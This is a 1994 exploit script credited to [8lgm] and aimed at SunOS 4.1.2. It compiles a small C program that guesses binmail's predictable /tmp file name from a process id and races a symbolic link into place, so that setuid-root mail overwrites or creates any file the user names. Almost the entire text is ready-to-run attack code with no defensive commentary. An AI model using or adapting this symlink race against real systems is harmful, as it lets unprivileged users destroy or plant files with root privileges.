tmpmail:
#!/bin/sh
# tmpmail: overwrite files using binmail
#
# Usage: tmpmail to-file
#
# (c) [8lgm] 1994, tested under SunOS 4.1.2.
#
#
# Note: Script only works if mail is suid root.
#       Other vendors may use tmpnam("ma").
#
# This vulnerability can be exploited for sgid
# mail binmails, the only modification would
# be to predict the pid of the mail process
# created by sendmail.  This would be 4 forward
# of the current pid - assuming a 'quiet' system.
#
# Will create to-file, or truncate.

PATH=/usr/ucb:/usr/bin:/bin      export PATH
IFS=" "                          export IFS

PROG="`basename $0`"

# Check args
if [ $# -ne 1 ]; then
        echo "Syntax: $PROG to-file"
        exit 1
fi

TO_FILE="$1"

# Check we're on SunOS
if [ "x`uname -s`" != "xSunOS" ]; then
        echo "Sorry, this only works on SunOS"
        exit 1
fi

# Create our racing program!

cat > mailrace.c << 'EOF'
#include <stdio.h>
#include <unistd.h>

char path[] = "/tmp/maaXXXX";

main(argc,argv)
int argc;
char **argv;
{
  int pid;
  char *trv;

  if (argc != 3) {
    fprintf(stderr, "Usage: %s pid tofile\n", argv[0]);
    exit(1);
  }

  pid = atoi(argv[1]);

/* Stolen from mktemp.c */
  for (trv = path; *trv; ++trv);          /* extra X's get set to 0's */
  while (*--trv == 'X') {
    *trv = (pid % 10) + '0';
    pid /= 10;
  }

  symlink("/tmp/ShortSong", path);
  while(symlink(argv[2], path));
  exit(0);
}
EOF
cc -o mailrace mailrace.c

# Check we now have mailrace
if [ ! -x "mailrace" ]; then
        echo "$PROG: couldnt compile mailrace.c - check it out"
        exit 1
fi

# create some input for binmail
echo localhost $USER > /tmp/BlueRoom.$$
./mailrace $$ $TO_FILE &
exec /bin/mail -d $LOGNAME < /tmp/BlueRoom.$$